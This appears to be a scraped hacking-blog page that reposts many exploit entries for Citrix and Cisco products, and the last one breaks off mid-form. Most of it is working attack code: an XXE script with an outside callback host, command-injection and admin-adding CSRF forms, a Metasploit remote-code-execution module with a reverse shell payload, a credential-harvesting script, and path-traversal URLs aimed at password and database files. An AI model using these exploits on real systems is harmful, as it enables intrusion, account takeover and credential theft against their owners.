# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653
#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
<jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
from pprint import pprint
import uuid
# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
id = str(uuid.uuid1())
xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''
print(id)
response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863134168
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection
# Date: 2019-08-28
# Exploit Author: Vahagn Vardanya
# Vendor Homepage:https://www.citrix.com/downloads/storefront/
# Software Link: https://support.citrix.com/article/CTX251988
# Version:
# Citrix StoreFront Server earlier than 1903
# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000)
# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)#
# Tested on: Windows
# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb
# PoC
POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
Content-Type: application/vnd.citrix.requesttoken+xml
Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd.
citrix.authenticateresponse-1+xml
Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
X-Forwarded-For: 192.168.204.1
X-Citrix-Agent: crm.
X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview
X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image
X-Citrix-IsUsingHTTPS: No
Host: 192.168.204.131
Content-Length: 331
Expect: 100-continue
<?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE
requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken
xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken
"><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/
<http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate
/><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>
# thel3l
# Title: Citrix Receiver/Receiver Desktop Lock 4.5 Incorrect Access Control
# CVE: CVE-2016-9111
# Date of Discovery: October 27 2016
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Citrix
# Vendor Homepage: https://www.citrix.com/
# Software Link: Receiver - https://www.citrix.com/go/receiver.html
Receiver Desktop Lock - https://www.citrix.com/downloads/citrix-receiver/additional-client-software/receiver-desktop-lock-45.html
# Version: 10.6.3
# Tested on: Windows 8.1, macOS 10.12.1 Sierra
# Category: local
# Vulnerability type: Incorrect Access Control
# Description: Allows attacker with physical access to VDI to bypass authentication requirement. Citrix Receiver and/or Desktop Lock for Mac OSX and Windows suffer from a local incorrect access control.
To exploit this:
1. An attacker would first identify a VDI with a logged in user, which has been locked.
2. The attacker then proceeds to disconnect the system from the network temporarily (removing and reinserting the LAN cable is enough).
3. Citrix Receiver then proceeds to unlock the session and allows the attacker full access to the connected user's account without confirming the user's identity.
# Additional Notes, References and links:
* This exploit is not 100% reliable - it may take a couple of tries to be able to accurately reproduce this behavior.
* This attack has only been attempted with physical access - it may also be possible to remotely script a restart of a network adapter to cause the same behavior.
Abstract
Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
Tested version
This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected.
Fix
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc.
Introduction
The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. Each instance is a full-blown NetScaler environment, which optimizes delivery of applications over the Internet and private networks. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK.
Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.
Details
This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
The following proof of concept can be used to exploit this issue;
<html>
<body>
<form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">
<input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" />
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
POST /nitro/v1/config/xen_hotfix HTTP/1.1
-----------------------------------------
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}
or
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}
Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.
# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: [http://www.citrix.com/]
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build 50.9.nc,]
Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution
Release Date:
===========
12 Mar 2015
Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.
Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)
Vulnerability Disclosure Timeline:
=========================
2 Feb 2015 Bug reported to the vendor.
4 Feb 2015 Vendor returned with a case ID.
5 Feb 2015 Detailed info/config given.
12 Feb 2015 Asked about the case.
16 Feb 2015 Vendor returned "investigating ..."
6 Mar 2015 Asked about the case.
6 Mar 2015 Vendor has validated the issue.
12 Mar 2015 There aren't any fix addressing the issue.
Discovery Status:
=============
Published
Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:
An Apache web server with default configuration on Windows (XAMPP).
A SOAP web service which has written in PHP and vulnerable to SQL injection.
Netscaler WAF with SQL injection rules.
First request: ‘ union select current_user,2# - Netscaler blocks it.
Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.
Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>’ union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<return xsi:type=“xsd:string”> Name: root@localhost </return>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
12 Mar 2015 There aren't any fix addressing the issue.
Security Risk:
==========
The risk of the vulnerability above estimated as high.
Credits & Authors:
==============
BGA Bilgi Güvenliği - Onur ALANBEL
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2015 | BGA
Abstract
It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center.
Tested version
This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable.
Fix
Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required).
https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html
Citrix assigned BUG0493933 to this issue.
Introduction
Citrix Command Center is a management and monitoring solution for Citrix application networking products. Command Center enables network administrators and operations teams to manage, monitor, and troubleshoot the entire global application delivery infrastructure from a single, unified console.
Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. No access control is enforced on this folder, an unauthenticated attacker can download any configuration file stored in this folder.
Details
Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way.
https://<target>:8443/conf/securitydbData.xml
This files contains encoded passwords, for example:
<DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/>
These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
action=logout
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC Remote Code Execution',
'Description' => %q(
An issue was discovered in Citrix Application Delivery Controller (ADC)
and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
),
'Author' => [
'RAMELLA Sébastien' # https://www.pirates.re/
],
'References' => [
['CVE', '2019-19781'],
['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
['EDB', '47901'],
['EDB', '47902']
],
'DisclosureDate' => '2019-12-17',
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl meterpreter'
}
},
'Targets' => [
['Unix (remote shell)',
'Type' => :cmd_shell,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_perl',
'DisablePayloadHandler' => 'false'
}
],
['Unix (command-line)',
'Type' => :cmd_generic,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'DisablePayloadHandler' => 'true'
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
OptAddress.new('RHOST', [true, 'The target address'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
deregister_options('RHOSTS')
end
def execute_command(command, opts = {})
filename = Rex::Text.rand_text_alpha(16)
nonce = Rex::Text.rand_text_alpha(6)
request = {
'method' => 'POST',
'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),
'headers' => {
'NSC_USER' => '../../../netscaler/portal/templates/' + filename,
'NSC_NONCE' => nonce
},
'vars_post' => {
'url' => 'http://127.0.0.1',
'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]",
'desc' => 'desc',
'UI_inuse' => 'RfWeb'
},
'encode_params' => false
}
begin
received = send_request_cgi(request)
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
print_error('Unable to connect on the remote target.')
end
return false unless received
if received.code == 200
vprint_status("#{received.get_html_document.text}")
sleep 2
request = {
'method' => 'GET',
'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),
'headers' => {
'NSC_USER' => nonce,
'NSC_NONCE' => nonce
}
}
## Trigger to gain exploitation.
begin
send_request_cgi(request)
received = send_request_cgi(request)
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
print_error('Unable to connect on the remote target.')
end
return false unless received
return received
end
return false
end
def get_chr_payload(command)
chr_payload = command
i = chr_payload.length
output = ""
chr_payload.each_char do | c |
i = i - 1
output << "chr(" << c.ord.to_s << ")"
if i != 0
output << " . "
end
end
return output
end
def check
begin
received = send_request_cgi(
"method" => "GET",
"uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')
)
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
print_error('Unable to connect on the remote target.')
end
if received && received.code != 200
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
unless check.eql? Exploit::CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
end
else
print_good('The target appears to be vulnerable.')
end
case target['Type']
when :cmd_generic
print_status("Sending #{datastore['PAYLOAD']} command payload")
vprint_status("Generated command payload: #{payload.encoded}")
received = execute_command(payload.encoded)
if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic")
print_warning('Dumping command output in parsed http response')
print_good("#{received.get_html_document.text}")
else
print_warning('Empty response, no command output')
return
end
when :cmd_shell
print_status("Sending #{datastore['PAYLOAD']} command payload")
vprint_status("Generated command payload: #{payload.encoded}")
execute_command(payload.encoded)
end
end
end
# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
# Date: 2019-12-17
# CVE: CVE-2019-19781
# Vulenrability: Path Traversal
# Vulnerablity Discovery: Mikhail Klyuchnikov
# Exploit Author: Dhiraj Mishra
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
# Vendor Homepage: https://www.citrix.com/
# References: https://support.citrix.com/article/CTX267027
# https://github.com/nmap/nmap/pull/1893
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"
description = [[
This NSE script checks whether the traget server is vulnerable to
CVE-2019-19781
]]
---
-- @usage
-- nmap --script https-citrix-path-traversal -p <port> <host>
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args
output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2019-19781:
-- | Host is vulnerable to CVE-2019-19781
-- @changelog
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
-- traversal vulnerability that allows attackers to read configurations or
any other file.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2019</elem>
-- <elem key="day">17</elem>
-- <elem key="month">12</elem>
-- </table>
-- </table>
-- <elem key="disclosure">17-12-2019</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://support.citrix.com/article/CTX267027</elem>
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
-- </table>
-- </table>
author = "Dhiraj Mishra (@RandomDhiraj)"
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}
portrule = shortport.ssl
action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'Citrix ADC Path Traversal',
state = vulns.STATE.NOT_VULN,
description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
]],
references = {
'https://support.citrix.com/article/CTX267027',
'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
},
dates = {
disclosure = {year = '2019', month = '12', day = '17'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/vpn/../vpns/cfg/smb.conf"
local response
local output = {}
local success = "Host is vulnerable to CVE-2019-19781"
local fail = "Host is not vulnerable"
local match = "[global]"
local credentials
local citrixADC
response = http.get(host, port.number, path)
if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK",
SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, citrixADC)
vuln.extra_info = stdnse.format_output(true, "Credentials are being
stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
else
vuln.check_results = stdnse.format_output(true, citrixADC)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end
return vuln_report:make_output(vuln)
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',
'Description' => %{
The remote device is affected by multiple vulnerabilities.
An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.
An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit
this to bypass authorization (CVE-2020-8193).
And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.
},
'Author' => [
'Donny Maasland', # Discovery
'mekhalleh (RAMELLA Sébastien)' # Module author (Zeop Entreprise)
],
'References' => [
['CVE', '2020-8193'],
['CVE', '2020-8195'],
['CVE', '2020-8196'],
['URL', 'https://dmaasland.github.io/posts/citrix.html'],
['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],
['URL', 'https://github.com/jas502n/CVE-2020-8193']
],
'DisclosureDate' => '2020-07-09',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),
OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def create_session
params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'
request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}",
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)
},
'data' => '<appfwprofile><login></login></appfwprofile>'
}
request = request.merge({'cookie' => @cookie}) if @cookie
response = send_request_raw(request)
unless response && response.code == 406
print_error("#{@message_prefix} - No response to session request.")
return
end
response.get_cookies
end
def fix_session_rand
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),
'cookie' => @cookie,
'vars_get' => {
'sid' => 'nsroot',
'username' => 'nsroot',
'force_setup' => '1'
}
)
if response && response.code == 302
location = response.headers['location']
response = send_request_cgi(
'method' => 'GET',
'uri' => location,
'cookie' => @cookie
)
return unless response && response.code == 200
end
response.to_s.scan(/rand = "([^"]+)"/).join
end
def read_lfi(path, var_rand)
params = "filter=path:#{path}"
request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}",
'cookie' => @cookie,
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),
'rand_key' => var_rand
},
'data' => '<clipermission></clipermission>'
}
response = send_request_raw(request)
end
def run_host(ip)
proto = (datastore['SSL'] ? 'https' : 'http')
@message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}"
@cookie = create_session
if @cookie && @cookie =~ /SESSID/
print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}")
var_rand = fix_session_rand
unless var_rand
print_error("#{@message_prefix} - Unable to get rand value.")
return Exploit::CheckCode::Unknown
end
print_status("#{@message_prefix} - Got rand: #{var_rand}")
print_status("#{@message_prefix} - Re-breaking session...")
create_session
case datastore['MODE']
when /discovery/
response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)
if response.code == 406
if response.body.include? ('root:*:0:0:')
print_warning("#{@message_prefix} - Vulnerable.")
return Exploit::CheckCode::Vulnerable
end
end
when /interactive/
# TODO: parse response
response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end
return
when /sessions/
# TODO: parse response
response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end
return
end
end
print_good("#{@message_prefix} - Not Vulnerable.")
return Exploit::CheckCode::Safe
end
end
source: https://www.securityfocus.com/bid/52522/info
Citrix Licensing is prone to a denial-of-service vulnerability.
A remote attacker can leverage this issue to crash the affected application, denying service to legitimate users.
Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be affected.
Proof-of-Concept:
http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF)
http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe)
# Exploit Title: Citadel WebCit < 926 - Session Hijacking Exploit
# Exploit Author: Simone Quatrini
# Version: 926
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="Webcit <= 926 Session Hijacking")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8080/")
parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response")
args = parser.parse_args()
url = args.url
verbose = args.verbose
def check_endpoint(url):
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
if response.status_code == 200:
print("[+] WebCit is reachable\n")
else:
print("\n[-] WebCit response code: ", response.status_code)
sys.exit()
def harvesting(url, verbose):
#Current Timestamp
epoch_time = int(time.time())
#harvesting technique only search for user that logged-in within the last ~20 minutes.
#increase the search_back_in variable's number to search even backwards (it will require more time and requests)
#Also, make sure that you're using the same timezone of the server
search_back_in = 999
print("[/] Credential harvesting in progress...")
while search_back_in > 0:
payload = str(epoch_time-search_back_in)+'|||||'
payload_hex = payload.encode(encoding='utf_8').hex()
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','Cookie':'webcit='+payload_hex+''}
response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
try:
cookievalue = bytes.fromhex(response.cookies['webcit'])
cookievalue = cookievalue.decode(encoding='utf_8')
parts = cookievalue.split('|')
if ((len(parts[1])) and (len(parts[2]))):
print("Credential found: ", cookievalue)
except:
if(verbose):
print("[-] Invalid returned cookie value not valid, skipping")
search_back_in = search_back_in - 1
print("[+] Credential harvesting done.")
# Default actions if only '--url' is passed
check_endpoint(url)
harvesting(url, verbose)
source: https://www.securityfocus.com/bid/47902/info
CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.
This issue is being monitored by Cisco Bug ID CSCto12704.
CiscoWorks Common Services 3.3 and prior are vulnerable.
http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
source: https://www.securityfocus.com/bid/47905/info
CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.
This issue is being monitored by Cisco Bug ID CSCto35577.
CiscoWorks Common Services 3.3 and prior are vulnerable.
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log
# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276
# Exploit PoC:
https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
# Firing this code will cause the system to reload which results in a DoS condition.
# Product : Cisco Wireless Controller
# Version : 3.6.10E (last version)
# Date: 23.07.2019
# Vendor Homepage: https://www.cisco.com
# Exploit Author: Mehmet Önder Key
# Website: htts://cloudvist.com
# CVE: CVE-2019-12624
# Description : The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to verify
the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site.
# Tested On : Win10 & KaliLinux
Add Admin CSRF Payload @Cisco Wireless Controller
---------------
<html>
<body>
<form action="http://IP/security/cfgSecurityAAAUsersCreate
<http://192.168.115.83/security/cfgSecurityAAAUsersCreate>" method="POST">
<input type="hidden" name="username" value="secretadmin" />
<input type="hidden" name="privilege" value="15" />
<input type="hidden" name="password" value="K3Y" />
<input type="hidden" name="description" value="CSRF" />
